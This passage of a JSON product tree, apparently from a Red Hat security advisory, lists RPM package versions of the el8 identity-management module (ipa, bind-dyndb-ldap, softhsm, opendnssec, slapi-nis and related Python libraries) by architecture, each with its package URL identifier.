"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=src"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product_id": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=src"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
